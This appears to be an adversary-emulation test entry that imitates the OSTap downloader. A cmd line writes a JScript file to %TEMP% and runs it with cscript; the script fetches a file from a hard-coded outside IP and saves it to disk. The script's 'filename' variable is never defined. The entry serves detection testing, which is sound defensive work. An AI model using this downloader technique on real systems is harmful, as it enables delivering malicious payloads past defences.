#TechniqueName: User Execution: Malicious File
#AtomicTestName: OSTap Payload Download
#Description: Uses cscript //E:jscript to download a file&
#Language: cmd

#commands
echo var url = "https://128.30.52.100/TR/PNG/iso_8859-1.txt", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > %TEMP%\OSTapGet.js
cscript //E:Jscript %TEMP%\OSTapGet.js


#cleanup_commands
del %TEMP%\OSTapGet.js /F /Q >nul 2>&1

